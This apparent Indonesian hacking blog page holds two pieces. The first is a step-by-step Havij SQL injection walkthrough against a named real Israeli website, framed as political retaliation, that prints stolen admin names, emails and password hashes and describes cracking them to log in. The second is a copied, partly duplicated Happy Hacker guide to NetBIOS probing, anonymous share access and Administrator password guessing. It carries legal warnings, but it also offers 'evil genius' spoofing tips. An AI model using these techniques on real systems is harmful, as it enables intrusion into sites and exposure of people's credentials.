Klik Find Admin lalu isi Path to search dengan http://www.xenia.co.il/ lalu klik start…. …. …………. Searching
Got that….
Page Found: http://www.xenia.co.il/login.php
Sekarang anda hanya tinggal ke halaman login, masukkan nama user password dan….
U gained an Access
Don`t Be Evil
Havij, sebuah tool yang powerfull untuk mendapatkan akses admin dengan teknik sql injection. download tool ini dibawah (Hey r3dm0v3.. u coded an awesome tool)
Download Havij:http://www.ziddu.com/download/10136078/Havij1.10.rar.html [/font] SQL Injection Tool
Ok saya asumsikan anda sudah download dan install di mesin anda. sekarang mari kita coba salah satu website milik Israel.. (hmmm…. kenapa salah satu website di negara anda dijadikan kelinci disini sangat berkaitan erat dengan agresi militer anda pada kapal relawan dunia untuk Palestina.. saya non muslim tapi arogansi Israel adalah buntut dari tutorial ini).
web target : http://www.xenia.co.il/index.php?page_id=93
seperti biasanya berikan tanda ‘ pada web tsb:
http://www.xenia.co.il/index.php?page_id=̢۪93
hasilnya dapat anda lihat pada gambar dibawah. BUG SQL Injection
Sekarang jalankan tool Havij lalu masukkan link tersebut lalu klik Analize dan tunggu beberapa saat (yang ini ga sampe 1 menit)….
hasilnya:
Havij 1.10 ready!
Analyzing http://www.xenia.co.il/index.php?page_id=̢۪93
Host IP: 212.150.130.231
Web Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
Powered-by: PHP/5.2.12
Keyword Found: mysql_num_rows():
I guess injection type is Integer?!
DB Server: MySQL
Selected Column Count is 2
Valid String Column is 1
Target Vulnerable :D
Current DB: xeniaco_xenia
w007s…… I Got the database… sekarang klik Tables lalu klik Get Tables
w007s….. I gOt the Tables from xeniaco_xenia database..
users_match
users_fav
params_parents
params_pages
params_icons
params
page_managers
page_banned
page_allowed
nuke_users
newsletter1
main_access
lpn_users_areas_maps
lpn_users_areas
ip_blocker
gallery_auth_users
form_datas
enter_rules
cat_tbl
bep_users_target
bep_users_cats
bep_pics
bep_other
bep_news
bep_links
bep_html_data
bep_files
bep_data
bep_banners
bep_addons
banners
admins
admin_titles
WhoIsOnLineTbl
WhoIsOnLineMessagesTbl
Table1
Nah .. pada tahap ini, anda perlu cari tahu… dimana letak table yang berisi informasi admin login. setelah ditelusuri ternyata terdapat pada tabel nuke_users. sekarang coba kita lihat isi kolom daripada tabel nuke_users.
Beri tanda centang pada nuke_users lalu klik Get Columns dan tunggu beberapa saat (hmmm… 10 detik aja).
w007ss…. cool.. got to check it out… saya dapatkan kolom sbb
regdate
status
regkey
user_msg_to_mail
mail_check_interval
mail_pass
mail_login
mail_port
mail_server
user_level
user_rank
user_attachsig
user_posts
user_char
newsletter
counter
commentmax
theme
ublock
ublockon
bio
noscore
thold
uorder
umode
storynum
apass
pass
user_cell
user_homephone
user_theme
user_viewemail
user_sig
user_homepage
user_from
user_sign
user_dob
user_regdate
user_avatar
l_name
femail
uname
name uid
newsletter1
nah.. ini adalah kolom dari tabel nuke_users yang berisi informasi registrasi, nama, password, email, nomor hp dari Admin website http://www.xenia.co.il.. sekarang saya akan mencoba mendapatkan akses selanjutnya ke website ini.. hmmmm…. saya ceklis aja kolom :
name
pass
(kolom lain ga penting.. cuma pengen dapat username dan passwordnya aja).
lalu klik Get Data dan
Hasilnya sebagai berikut :
Count(*) of xeniaco_xenia.nuke_users is 3
Data Found: name=à åãé
Data Found: email=udi@tmuna.co.il
Data Found: pass=b440097c79ba6183170f5f118b47a31d
Data Found: name=guy
Data Found: email=guy@xenia.co.il
Data Found: pass=f4384abb3921b5cf321a5a24960c4aef
Data Found: name=inbar
Data Found: email=inbar@xenia.co.il
Data Found: pass=b3f61131b6eceeb2b14835fa648a48ff
w007s…. ternyata website ini memiliki 3 administrator…
hmmmm… passwordnya di HASH alias di-enkripsi….. no problem… havij juga punya md5 hash crack..
Klik MD5 masukkan data salah satu data HASH lalu klik start (tunggu beberapa saat…. 30 detik deh). lalu hasilnya
w0000000000000000000000000000007ZZZZZZZZZZZZZZZZ… password berhasil di-crack.. sekarang tinggal cari halaman login.
Klik Find Admin lalu isi Path to search dengan http://www.xenia.co.il/ lalu klik start…. …. …………. Searching
Got that….
Page Found: http://www.xenia.co.il/login.php
Sekarang anda hanya tinggal ke halaman login, masukkan nama user password dan….
U gained an Access
Don`t Be Evil
Jumat, 10 Juni 2011
NetBios Explained
The Magic of NetBIOS
In this guide you will learn how to explore the Internet using Windows XP and NetBIOS:
• How to Install NetBIOS
• How to Use Nbtstat
• The Net View Command
• What to Do Once You Are Connected
• How to Break in Using the XP GUI
• More on the Net Commands
• How Crackers Break in as Administrator
• How to Scan for Computers that Use NetBIOS
• How to Play NetBIOS Wargames
• An Evil Genius Tip for Win NT Server Users
• Help for Windows 95, 98, SE and ME Users
Not many computers are reachable over the Internet using NetBIOS commands - maybe only a few million. But what the heck, a few million is enough to keep a hacker from getting bored. And if you know what to look for, you will discover that there are a lot of very busy hackers and Internet worms searching for computers they can break into by using NetBIOS commands. By learning the dangers of NetBIOS, you can get an appreciation for why it is a really, truly BAD!!! idea to use it.
*****************
Newbie note: a worm is a program that reproduces itself. For example, Code Red automatically searched over the Internet for vulnerable Windows computers and broke into them. So if you see an attempt to break into your computer, it may be either a human or a worm.
*****************
If you run an intrusion detection system (IDS) on your computer, you are certain to get a lot of alerts of NetBIOS attacks. Here's an example:
The firewall has blocked Internet access to your computer (NetBIOS Session) from 10.0.0.2 (TCP Port 1032) [TCP Flags: S].
Occurred: 2 times between 10/29/2002 7:38:20 AM and 10/29/2002 7:46:18 AM
A Windows NT server on my home network, which has addresses that all start with 10.0.0, caused these alerts. In this case the server was just doing its innocent thing, looking for other Windows computers on my LAN (local area network) that might need to network with it. Every now and then, however, an attacker might pretend to have an address from your internal network even though it is attacking from outside.
If a computer from out on the Internet tries to open a NetBIOS session with one of mine, I'll be mighty suspicious. Here's one example of what an outside attack may look like:
The firewall has blocked Internet access to your computer (NetBIOS Name) from 999.209.116.123 (UDP Port 1028).
Time: 10/30/2002 11:10:02 AM
(The attacker's IP address has been altered to protect the innocent or the guilty, as the case may be.)
Want to see how intensely crackers and worms are scanning the Internet for potential NetBIOS targets? A really great and free IDS for Windows that is also a firewall is Zone Alarm. You can download it for free from http://www.zonelabs.com . You can set it to pop up a warning on your screen whenever someone or some worm attacks your computer. You will almost certainly get a NetBIOS attack the first day you use your IDS.
Do you need to worry when a NetBIOS attack hits? Only if you have enabled NetBIOS and Shares on your computer. Unfortunately, in order to explore other computers using NetBIOS, you increase the danger to your own computer from attack by NetBIOS. But, hey, to paraphrase a famous carpenter from Galilee, he who lives by the NetBIOS gets hacked by the NetBIOS.
********************
Newbie note: NetBEUI (NetBIOS Extended User Interface) is an out-of-date, crummy, not terribly secure way for Windows computers to communicate with each other in a peer-to-peer mode. NetBIOS stands for network basic input/output system.
Newbie note: Shares are when you make it so other computers can access files and directories on your computer. If you set up your computer to use NetBIOS, in Win XP using the NTFS (new technology file system) you can share files and directories by bringing up My Computer. Click on a directory - which in XP is called a "folder". In the left-hand column a task will appear called "Share this folder". By clicking this you can set who can access this folder, how many people at a time can access it, and what they can do with the folder.
********************
There are a number of network exploration commands that only NetBIOS uses. We will show how to use nbtstat and several versions of the net command.
How to Install NetBIOS
You might have to make changes on your system in order to use these commands. Here's how to enable NetBIOS for Windows XP. (If you are stuck with Windows 95, 98, SE or ME, see the end of this Guide for how to enable NetBIOS.) Click:
Control Panel -> Network Connections
There are two types of network connections that may appear here: "Dial-up" and "LAN or High-Speed Internet".
**************
Newbie note: A dial-up connection uses a modem to reach the Internet. LAN stands for local area network. It's what you have if two or more computers are linked to each other with a cable instead of modems. Most schools and businesses have LANs, as well as homes with Internet connection sharing. A DSL or cable modem connection will also typically show up as a LAN connection.
**************
To configure your connections for hacking, double click on the connection you plan to use. That brings up a box that has a button labeled "Properties". Clicking it brings up a box that says "This connection uses the following items:"
You need to have both TCP/IP and NWLink NetBIOS showing. If NWLink NetBIOS is missing, here's how to add it. Click Install -> Protocol -> Add NWlink/IPX/SPX/NetBIOS Compatible Transport Protocol.
**************
Newbie note: NWLink refers to Novell's Netware protocol for running a LAN.
**************
How to Use Nbtstat
To get started, bring up the cmd.exe command. Click Start -> Run and type cmd.exe in the command line box. This brings up a black screen with white letters. Once it is up, we will play with the nbtstat command. To get help for this command, just type:
C:\>nbtstat help
One way to use the nbtstat command is to try to get information from another computer using either its domain name (for example test.target.com), its numerical Internet address (for example, happyhacker.org's numerical address is 206.61.52.30), or its NetBIOS name (if you are on the same LAN).
C:\>nbtstat -a 10.0.0.2
Local Area Connection:
Node IpAddress: [10.0.0.1] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
OLDGUY <00> UNIQUE Registered
OLDGUY <20> UNIQUE Registered
WARGAME <00> GROUP Registered
INet~Services <1C> GROUP Registered
IS~OLDGUY......<00> UNIQUE Registered
OLDGUY <03> UNIQUE Registered
WARGAME <1E> GROUP Registered
ADMINISTRATOR <03> UNIQUE Registered
MAC Address = 52-54-00-E4-6F-40
What do these things tell us about this computer? Following is a table explaining the codes you may see with an nbtstat command (taken from the MH Desk Reference, written by the Rhino9 team).
Name Number Type Usage =========================================================
00 U Workstation Service
01 U Messenger Service
<\\_MSBROWSE_> 01 G Master Browser
03 U Messenger Service
06 U RAS Server Service
1F U NetDDE Service
20 U File Server Service
21 U RAS Client Service
22 U Exchange Interchange
23 U Exchange Store
24 U Exchange Directory
30 U Modem Sharing Server Service
31 U Modem Sharing Client Service
43 U SMS Client Remote Control
44 U SMS Admin Remote Control Tool
45 U SMS Client Remote Chat
46 U SMS Client Remote Transfer
4C U DEC Pathworks TCPIP Service
52 U DEC Pathworks TCPIP Service
87 U Exchange MTA
6A U Exchange IMC
BE U Network Monitor Agent
BF U Network Monitor Apps
03 U Messenger Service
00 G Domain Name
1B U Domain Master Browser
1C G Domain Controllers
1D U Master Browser
1E G Browser Service Elections
1C G Internet Information Server
00 U Internet Information Server
To keep this Guide from being ridiculously long, we'll just explain a few of the things what we learned when we ran nbtstat -a against 10.0.0.2:
* it uses NetBIOS
* its NetBIOS name is Oldguy
* one of the users is named Administrator
* it runs a web site with Internet Information Server, and maybe an ftp - file transfer protocol -- server
* it is a member of the domain Wargame
* it is connected on a local area network and we accessed it through an Ethernet network interface card (NIC) with a MAC Address of 52-54-00-E4-6F-40.
When using nbtstat over the Internet, in most cases it will not find the correct MAC address. However, sometimes you get lucky. That is part of the thrill of legal hacker exploration. OK, OK, maybe getting a thrill out of a MAC address means I'm some kind of a freak. But if you are reading this, you probably are freaky enough to be a hacker, too.
**************
Newbie note: MAC stands for media access control. In theory every NIC ever made has a unique MAC address, one that no other NIC has. In practice, however, some manufacturers make NICs that allow you to change the MAC address.
**************
**************
Evil Genius tip: sneak your computer onto a LAN and use it to find the MAC address of a very interesting computer. Crash it, then give yours the same MAC, NetBIOS name and Internet address as the very interesting computer. Then see what you can do while faking being that computer. That's why I get a charge out of discovering a MAC address, so stop laughing at me already.
**************
**************
You can get fired, expelled, busted and catch cooties warning: Faking all that stuff is something you would be better off doing only on your own test network, or with written permission from the owner of the very interesting computer.
**************
Now that we know some basic things about computer 10.0.0.2, also known as Oldguy, we can do some simple things to learn more. We can connect to it with a web browser to see what's on the web site, and with ftp to see if it allows anonymous users to download or upload files. In the case of Oldguy, anyone can browse the web site. However, when we try to connect to its ftp server with Netscape by giving the location ftp://10.0.0.2, it returns the message "User Mozilla@ cannot log in.
**************
Newbie note: The people who programmed Netscape have always called it Mozilla, after a famous old movie monster. As a joke they have stuck obscure mentions of Mozilla into the operations of Netscape. Mozilla lovers recently spun off a pure Mozilla browser project that has the web site http://www.mozilla.org.
**************
The Net View Command
Now let's have some serious fun. Netscape (or any browser or ftp program) uses TCP/IP to connect. What happens if we use NetBIOS instead to try to download files from Oldguy's ftp server?
Let's try some more NetBIOS commands:
C:\>net view \\10.0.0.2
System error 53 has occurred.
The network path was not found.
I got this message because my firewall blocked access to Oldguy, giving the message:
The firewall has blocked Internet access to 10.0.0.2 (TCP Port 445) from your computer [TCP Flags: S].
There's a good reason for this. My firewall/IDS is trying to keep me from carelessly making my computer a part of some stranger's LAN. Keep in mind that NetBIOS is a two-way street. However, I want to run this command, so I shut down Zone Alarm and give the command again:
C:\>net view \\10.0.0.2
Shared resources at \\10.0.0.2
Share name Type Used as Comment
--------------------------------------------------------
ftproot Disk
InetPub Disk
wwwroot Disk
The command completed successfully.
This is a list of shared directories. Oooh, look at that, the ftp server is shared. Does this mean I can get in? When setting shares on a Windows NT server, the default choice is to allow access to read, write and delete files to everyone. So sometimes a sysadmin carelessly fails to restrict access to a share.
What is really important is that we didn't need a user name or password to get this potentially compromising information.
Let's establish an anonymous connection to Oldguy, meaning we connect without giving it a user name or password:
C:\>net use \\10.0.0.2\ipc$
Local name
Remote name \\10.0.0.2\IPC$
Resource type IPC
Status OK
# Opens 0
# Connections 1
The command completed successfully.
We are connected!
**********************
Newbie note: IPC (ipc$) stands for "Inter Process Connector", used to set up connections across a network between Windows computers using NetBIOS.
**********************
What to Do Once you Are Connected
So far we haven't quite been breaking the law, although we have been getting pretty rude if the owner of that target computer hasn't given us permission to explore. What if we want to stop pushing our luck and decide to disconnect? Just give the message:
C:\>net session \\10.0.0.2 /delete
Of course you would substitute the name or number of the computer to which you are connected for 10.0.0.2.
What if you want to stay connected? Oldguy will let you stay connected even if you do nothing more. By contrast, a login to a Unix/Linux type computer will normally time out and disconnect you if you go too long without doing anything.
How to Break in Using the XP GUI
You could try out the other net commands on Oldguy. Or you can go to the graphical user interface (GUI) of XP. After running the above commands I click My Computer, then My Network Places and there you'll find the victim, er, I mean, target computer. By clicking on it, I discover that ftproot has been shared to - everyone!
Let's say you were to get this far investigating some random computer you found on the Internet. Let's say you had already determined that the ftp server isn't open to the public. At this moment you would have a little angel sitting one shoulder whispering "You can be a hero. Email the owner of that computer to tell him or her about that misconfigured ftproot."
On the other shoulder a little devil is sneering, "Show the luser no mercy. Information should be free. Because I said so, that's why. Hot darn, are those spreadsheets from the accounting department? You could make a lot of bucks selling those files to a competitor, muhahaha! Besides, you're so ugly that future cellmate Spike won't make you be his girlfriend."
Some hackers might think that because ftproot is shared to the world that it is OK to download stuff from it. However, if someone were to log in properly to that ftp server, he or she would get the message "Welcome to Oldguy on Carolyn Meinel's LAN. Use is restricted to only those for whom Meinel has assigned a user name and password." This warning logon banner is all a computer owner needs to legally establish that no one is allowed to just break in. It won't impress a judge if a cracker says "The owner was so lame that her computer deserved to get broken into" or "I'm so lame that I forgot to try to use the ftp server the normal way."
More on the Net Commands
Let's get back to the net commands. There are many forms of this command. In XP you can learn about them with the command:
C:\>net help
The syntax of this command is:
NET HELP
command
-or-
NET command /HELP
Commands available are:
• NET ACCOUNTS
• NET HELP
• NET SHARE
NET COMPUTER
• NET HELPMSG
• NET START
• NET CONFIG
• NET LOCALGROUP
• NET STATISTICS
• NET CONFIG SERVER
• NET NAME
• NET STOP
• NET CONFIG WORKSTATION
• NET PAUSE
• NET TIME
• NET CONTINUE
• NET PRINT
• NET USE
• NET FILE
• NET SEND
• NET USER
• NET GROUP
• NET SESSION
• NET VIEW
• NET HELP SERVICES lists some of the services you can start.
• NET HELP SYNTAX explains how to read NET HELP syntax lines.
• NET HELP command | MORE displays Help one screen at a time.
How Crackers Break in as Administrator
As we look around Oldguy further, we see that there's not much else an anonymous user can do to it. We know that there is a user named Administrator. What can we do if we can convince Oldguy that we are Administrator?
******************
Newbie note: in Windows NT, 2000 and XP, the Administrator user has total power over its computer, just as root has total power over a Unix/Linux type computer. However, it is possible to change the name of Administrator so an attacker has to guess which user has all the power.
******************
Let's try to log in as Administrator by guessing the password. Give the command:
C:\>net use \\10.0.0.2\ipc$ * /user:Administrator
Type the password for \\10.0.0.2\ipc$:
System error 1219 has occurred.
Multiple connections to a server or shared resource by the same user, using more than one user name, are not allowed. Disconnect all previous connections to the server or shared resource and try again.
This means that someone else is currently logged onto this server who has Administrator rights. Furthermore, this person is probably watching me on an IDS and thinking up terrible things to do to me. Eeep! Actually this is all going on inside my hacker lab - but you get the idea of what it could be like when trying to invade a computer without permission.
I discover that whether I guess the password correctly or not, I always get the same error message. This is a good safety feature. On the other hand, one of the users is named Administrator. This is a bad thing for the defender. When you first set up a Windows NT or 2000 server, there is always a user called Administrator, and he or she has total power over that computer. If you know the all-powerful user is named Administrator, you can try guessing the password whenever no one is logged on with Administrator powers.
Computer criminals don't waste time guessing by hand. They use a program such as NAT or Legion to get passwords. These programs are why smart NT administrators rename their Administrator accounts and choose hard passwords. Also, this kind of persistent attack will be detected by an intrusion detection system, making it easy to catch criminals at work.
********************
You can get expelled warning: What if you are a student and you want to save your school from malicious code kiddies who steal tests and change grades? It is important to get permission *in writing* before you test the school's network. Even then, you still must be careful to be a model student. If you act up, cut classes - you know what I mean - the first time a cracker messes up the network, who do you think they will suspect? Yes, it's unfair, and yes, that is the way the world works.
********************
How to Scan for Computers that Use NetBIOS
Your tool of choice is a port scanner. Any computer that is running something on port 139 is likely (but not certain) to be using NetBIOS. Most crackers use nmap to port scan. This tool runs on Unix/Linux type computers. You can get it at . There is also a Windows version of nmap, but it isn't very good. A better choice for Windows is Whats Up from . You can get a one month free trial of it.
Here's an example of an nmap scan of Oldguy:
test-box:/home/cmeinel # nmap -sTU 10.0.0.2
Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
Interesting ports on (10.0.0.2):
(The 3060 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
70/tcp open gopher
80/tcp open http
135/tcp open loc-srv
135/udp open loc-srv
137/udp open netbios-ns
138/udp open netbios-dgm
139/tcp open netbios-ssn
500/udp open isakmp
Nmap run completed -- 1 IP address (1 host up) scanned in 8 seconds
As you can see from this scan, three ports are identified with NetBIOS. This tells us that we could set nmap to scan a large number of Internet addresses, only looking for port 139 on each. To learn how to set up nmap to run this way, in your Unix or Linux shell give the command "man nmap".
For more on what crackers do once they break into a computer using NetBIOS (like installing back doors), see http://happyhacker.org/gtmhh/vol3no10.shtml.
********************
You can get punched in the nose warning: if you use a port scanner against networks that haven't given you permission to scan, you will be waving a red flag that says "Whaddaya wanna bet I'm a computer criminal?" You can't get arrested for merely port scanning, but people who don't like being scanned might get you kicked off your Internet service provider.
You can get really, big time, punched in the nose warning: If you visit the same computer or LAN really often to see what's new and to try different things, even if you don't break the law you'd better be doing it with the permission of the owner. Otherwise you may make enemies who might crash or destroy your operating system. And that is only what they may do when feeling mellow. After a night of hard drinking - well, you don't want to find out.
********************
How to Play NetBIOS Wargames
What if you want to challenge your friends to a hacker wargame using NetBIOS? The first thing to do is *don't* email me asking me to break in for you. Sheesh. Seriously, almost every day I get emails from people claiming to have permission from their girlfriend/boyfriend and begging me to help them break in. You can read their hilarious pleas for help at http://happyhacker.org/sucks/ <../sucks/index.shtml> .
The way to run a hacker wargame over the Internet is first, get permission from your Internet provider so they don't kick you off for hacking. They probably run an IDS that scans users for suspicious activity. They probably hate malicious hackers. Enough said.
Second, you and your friends are likely to be at a different Internet address every time you log on. Your safest way to play over the Internet is for each player to get an Internet address that is the same every time he or she logs on: a "static" address. This way you won't accidentally break into someone else's computer.
You have to arrange with your Internet provider to get a static address. Normally only a local provider can do this for you. A big advantage of using a local provider is you can make friends with the people who work there - and they are probably hackers.
If you live in an apartment building or dormitory with other hackers, you can play break-in games without using the Internet. Set up a LAN where you can play together. For example, you can string Ethernet cable from window to window. To learn how to set up a Windows Ethernet LAN, see http://happyhacker.org/gtmhh/winlan.shtml .
Or you could set up a wireless LAN. With wireless you never know who might come cruising with a laptop down the street by your home or business and break in. That can make a wargame lots more fun. For help on how to break into wireless LANs (it's pathetically easy), see .
**************
Evil genius tip: Attack using a Win NT server with the Microsoft Resource Kit installed. Heh, heh. With it you can give the command:
C:\>Local Administrators \\
This should show all user accounts with administrator rights on targetbox.com.
C:\>Global Administrators \\
This should show all user accounts with Domain administrative rights. These are exceptionally worth compromising, because with one Domain administrative password you will be able to control many resources among NT servers, workstations, and Win 95/98 computers.
I've tried to install the Resource Kit on XP Professional, but it wasn't compatible.
Another option is to install hacker tools such as Red Button and DumpACL, which extract information on user names, hashes, and which services are running on a given machine.
**************
Help for users of Windows 95, 98, SE or ME
To enable NetBIOS, click
Control Panel -> Network -> Protocols
If you see both NetBEUI and TCP/IP, you are already using NetBIOS. If not, add NetBEUI.
To bring up the command screen, click Start -> Run and type in command.com.
In this guide you will learn how to explore the Internet using Windows XP and NetBIOS:
• How to Install NetBIOS
• How to Use Nbtstat
• The Net View Command
• What to Do Once You Are Connected
• How to Break in Using the XP GUI
• More on the Net Commands
• How Crackers Break in as Administrator
• How to Scan for Computers that Use NetBIOS
• How to Play NetBIOS Wargames
• An Evil Genius Tip for Win NT Server Users
• Help for Windows 95, 98, SE and ME Users
Not many computers are reachable over the Internet using NetBIOS commands - maybe only a few million. But what the heck, a few million is enough to keep a hacker from getting bored. And if you know what to look for, you will discover that there are a lot of very busy hackers and Internet worms searching for computers they can break into by using NetBIOS commands. By learning the dangers of NetBIOS, you can get an appreciation for why it is a really, truly BAD!!! idea to use it.
*****************
Newbie note: a worm is a program that reproduces itself. For example, Code Red automatically searched over the Internet for vulnerable Windows computers and broke into them. So if you see an attempt to break into your computer, it may be either a human or a worm.
*****************
If you run an intrusion detection system (IDS) on your computer, you are certain to get a lot of alerts of NetBIOS attacks. Here's an example:
The firewall has blocked Internet access to your computer (NetBIOS Session) from 10.0.0.2 (TCP Port 1032) [TCP Flags: S].
Occurred: 2 times between 10/29/2002 7:38:20 AM and 10/29/2002 7:46:18 AM
A Windows NT server on my home network, which has addresses that all start with 10.0.0, caused these alerts. In this case the server was just doing its innocent thing, looking for other Windows computers on my LAN (local area network) that might need to network with it. Every now and then, however, an attacker might pretend to have an address from your internal network even though it is attacking from outside.
If a computer from out on the Internet tries to open a NetBIOS session with one of mine, I'll be mighty suspicious. Here's one example of what an outside attack may look like:
The firewall has blocked Internet access to your computer (NetBIOS Name) from 999.209.116.123 (UDP Port 1028).
Time: 10/30/2002 11:10:02 AM
(The attacker's IP address has been altered to protect the innocent or the guilty, as the case may be.)
Want to see how intensely crackers and worms are scanning the Internet for potential NetBIOS targets? A really great and free IDS for Windows that is also a firewall is Zone Alarm. You can download it for free from http://www.zonelabs.com . You can set it to pop up a warning on your screen whenever someone or some worm attacks your computer. You will almost certainly get a NetBIOS attack the first day you use your IDS.
Do you need to worry when a NetBIOS attack hits? Only if you have enabled NetBIOS and Shares on your computer. Unfortunately, in order to explore other computers using NetBIOS, you increase the danger to your own computer from attack by NetBIOS. But, hey, to paraphrase a famous carpenter from Galilee, he who lives by the NetBIOS gets hacked by the NetBIOS.
********************
Newbie note: NetBEUI (NetBIOS Extended User Interface) is an out-of-date, crummy, not terribly secure way for Windows computers to communicate with each other in a peer-to-peer mode. NetBIOS stands for network basic input/output system.
Newbie note: Shares are when you make it so other computers can access files and directories on your computer. If you set up your computer to use NetBIOS, in Win XP using the NTFS (new technology file system) you can share files and directories by bringing up My Computer. Click on a directory - which in XP is called a "folder". In the left-hand column a task will appear called "Share this folder". By clicking this you can set who can access this folder, how many people at a time can access it, and what they can do with the folder.
********************
There are a number of network exploration commands that only NetBIOS uses. We will show how to use nbtstat and several versions of the net command.
How to Install NetBIOS
You might have to make changes on your system in order to use these commands. Here's how to enable NetBIOS for Windows XP. (If you are stuck with Windows 95, 98, SE or ME, see the end of this Guide for how to enable NetBIOS.) Click:
Control Panel -> Network Connections
There are two types of network connections that may appear here: "Dial-up" and "LAN or High-Speed Internet".
**************
Newbie note: A dial-up connection uses a modem to reach the Internet. LAN stands for local area network. It's what you have if two or more computers are linked to each other with a cable instead of modems. Most schools and businesses have LANs, as well as homes with Internet connection sharing. A DSL or cable modem connection will also typically show up as a LAN connection.
**************
To configure your connections for hacking, double click on the connection you plan to use. That brings up a box that has a button labeled "Properties". Clicking it brings up a box that says "This connection uses the following items:"
You need to have both TCP/IP and NWLink NetBIOS showing. If NWLink NetBIOS is missing, here's how to add it. Click Install -> Protocol -> Add NWlink/IPX/SPX/NetBIOS Compatible Transport Protocol.
**************
Newbie note: NWLink refers to Novell's Netware protocol for running a LAN.
**************
How to Use Nbtstat
To get started, bring up the cmd.exe command. Click Start -> Run and type cmd.exe in the command line box. This brings up a black screen with white letters. Once it is up, we will play with the nbtstat command. To get help for this command, just type:
C:\>nbtstat help
One way to use the nbtstat command is to try to get information from another computer using either its domain name (for example test.target.com), its numerical Internet address (for example, happyhacker.org's numerical address is 206.61.52.30), or its NetBIOS name (if you are on the same LAN).
C:\>nbtstat -a 10.0.0.2
Local Area Connection:
Node IpAddress: [10.0.0.1] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
OLDGUY <00> UNIQUE Registered
OLDGUY <20> UNIQUE Registered
WARGAME <00> GROUP Registered
INet~Services <1C> GROUP Registered
IS~OLDGUY......<00> UNIQUE Registered
OLDGUY <03> UNIQUE Registered
WARGAME <1E> GROUP Registered
ADMINISTRATOR <03> UNIQUE Registered
MAC Address = 52-54-00-E4-6F-40
What do these things tell us about this computer? Following is a table explaining the codes you may see with an nbtstat command (taken from the MH Desk Reference, written by the Rhino9 team).
Name Number Type Usage =========================================================
<\\_MSBROWSE_> 01 G Master Browser
To keep this Guide from being ridiculously long, we'll just explain a few of the things what we learned when we ran nbtstat -a against 10.0.0.2:
* it uses NetBIOS
* its NetBIOS name is Oldguy
* one of the users is named Administrator
* it runs a web site with Internet Information Server, and maybe an ftp - file transfer protocol -- server
* it is a member of the domain Wargame
* it is connected on a local area network and we accessed it through an Ethernet network interface card (NIC) with a MAC Address of 52-54-00-E4-6F-40.
When using nbtstat over the Internet, in most cases it will not find the correct MAC address. However, sometimes you get lucky. That is part of the thrill of legal hacker exploration. OK, OK, maybe getting a thrill out of a MAC address means I'm some kind of a freak. But if you are reading this, you probably are freaky enough to be a hacker, too.
**************
Newbie note: MAC stands for media access control. In theory every NIC ever made has a unique MAC address, one that no other NIC has. In practice, however, some manufacturers make NICs that allow you to change the MAC address.
**************
**************
Evil Genius tip: sneak your computer onto a LAN and use it to find the MAC address of a very interesting computer. Crash it, then give yours the same MAC, NetBIOS name and Internet address as the very interesting computer. Then see what you can do while faking being that computer. That's why I get a charge out of discovering a MAC address, so stop laughing at me already.
**************
**************
You can get fired, expelled, busted and catch cooties warning: Faking all that stuff is something you would be better off doing only on your own test network, or with written permission from the owner of the very interesting computer.
**************
Now that we know some basic things about computer 10.0.0.2, also known as Oldguy, we can do some simple things to learn more. We can connect to it with a web browser to see what's on the web site, and with ftp to see if it allows anonymous users to download or upload files. In the case of Oldguy, anyone can browse the web site. However, when we try to connect to its ftp server with Netscape by giving the location ftp://10.0.0.2, it returns the message "User Mozilla@ cannot log in.
**************
Newbie note: The people who programmed Netscape have always called it Mozilla, after a famous old movie monster. As a joke they have stuck obscure mentions of Mozilla into the operations of Netscape. Mozilla lovers recently spun off a pure Mozilla browser project that has the web site http://www.mozilla.org.
**************
The Net View Command
Now let's have some serious fun. Netscape (or any browser or ftp program) uses TCP/IP to connect. What happens if we use NetBIOS instead to try to download files from Oldguy's ftp server?
Let's try some more NetBIOS commands:
C:\>net view \\10.0.0.2
System error 53 has occurred.
The network path was not found.
I got this message because my firewall blocked access to Oldguy, giving the message:
The firewall has blocked Internet access to 10.0.0.2 (TCP Port 445) from your computer [TCP Flags: S].
There's a good reason for this. My firewall/IDS is trying to keep me from carelessly making my computer a part of some stranger's LAN. Keep in mind that NetBIOS is a two-way street. However, I want to run this command, so I shut down Zone Alarm and give the command again:
C:\>net view \\10.0.0.2
Shared resources at \\10.0.0.2
Share name Type Used as Comment
--------------------------------------------------------
ftproot Disk
InetPub Disk
wwwroot Disk
The command completed successfully.
This is a list of shared directories. Oooh, look at that, the ftp server is shared. Does this mean I can get in? When setting shares on a Windows NT server, the default choice is to allow access to read, write and delete files to everyone. So sometimes a sysadmin carelessly fails to restrict access to a share.
What is really important is that we didn't need a user name or password to get this potentially compromising information.
Let's establish an anonymous connection to Oldguy, meaning we connect without giving it a user name or password:
C:\>net use \\10.0.0.2\ipc$
Local name
Remote name \\10.0.0.2\IPC$
Resource type IPC
Status OK
# Opens 0
# Connections 1
The command completed successfully.
We are connected!
**********************
Newbie note: IPC (ipc$) stands for "Inter Process Connector", used to set up connections across a network between Windows computers using NetBIOS.
**********************
What to Do Once you Are Connected
So far we haven't quite been breaking the law, although we have been getting pretty rude if the owner of that target computer hasn't given us permission to explore. What if we want to stop pushing our luck and decide to disconnect? Just give the message:
C:\>net session \\10.0.0.2 /delete
Of course you would substitute the name or number of the computer to which you are connected for 10.0.0.2.
What if you want to stay connected? Oldguy will let you stay connected even if you do nothing more. By contrast, a login to a Unix/Linux type computer will normally time out and disconnect you if you go too long without doing anything.
How to Break in Using the XP GUI
You could try out the other net commands on Oldguy. Or you can go to the graphical user interface (GUI) of XP. After running the above commands I click My Computer, then My Network Places and there you'll find the victim, er, I mean, target computer. By clicking on it, I discover that ftproot has been shared to - everyone!
Let's say you were to get this far investigating some random computer you found on the Internet. Let's say you had already determined that the ftp server isn't open to the public. At this moment you would have a little angel sitting one shoulder whispering "You can be a hero. Email the owner of that computer to tell him or her about that misconfigured ftproot."
On the other shoulder a little devil is sneering, "Show the luser no mercy. Information should be free. Because I said so, that's why. Hot darn, are those spreadsheets from the accounting department? You could make a lot of bucks selling those files to a competitor, muhahaha! Besides, you're so ugly that future cellmate Spike won't make you be his girlfriend."
